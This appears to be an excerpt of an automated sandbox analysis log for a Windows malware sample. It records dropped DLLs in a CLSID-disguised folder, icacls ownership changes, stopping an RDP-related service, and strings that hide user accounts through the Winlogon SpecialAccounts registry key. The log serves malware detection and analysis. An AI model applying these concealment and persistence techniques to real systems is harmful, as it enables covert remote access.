Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll
Source: C:\Users\user\Desktop\cZO.exe File created: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\EgwqOk24
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\o6oDuAJl
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\OwuZZod2
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll
Source: C:\Users\user\Desktop\cZO.exe File created: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\YXkdIYk6
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\YkhL6reh
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\GmdNT1AN
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\GEGgzh0sJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\XpOp833vJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\I77yQ5inJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\EgwqOk24Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\o6oDuAJlJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\OwuZZod2Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\YXkdIYk6Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe File created: C:\Users\user\AppData\Local\Temp\installer.log
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF6BE038C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,22_2_00007FF6BE038C4A
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000016.00000003.2455168978.000002234F1D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000003.2455168978.000002234F1D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000020.00000002.3263957296.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000020.00000002.3263957296.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: samctl.dll.22.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: samctl.dll.22.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: update.pkg.11.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: update.pkg.11.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Users\user\Desktop\cZO.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,22_2_00007FF8B91834F4
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,32_2_00007FF8B91834F4
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8B9152BA8
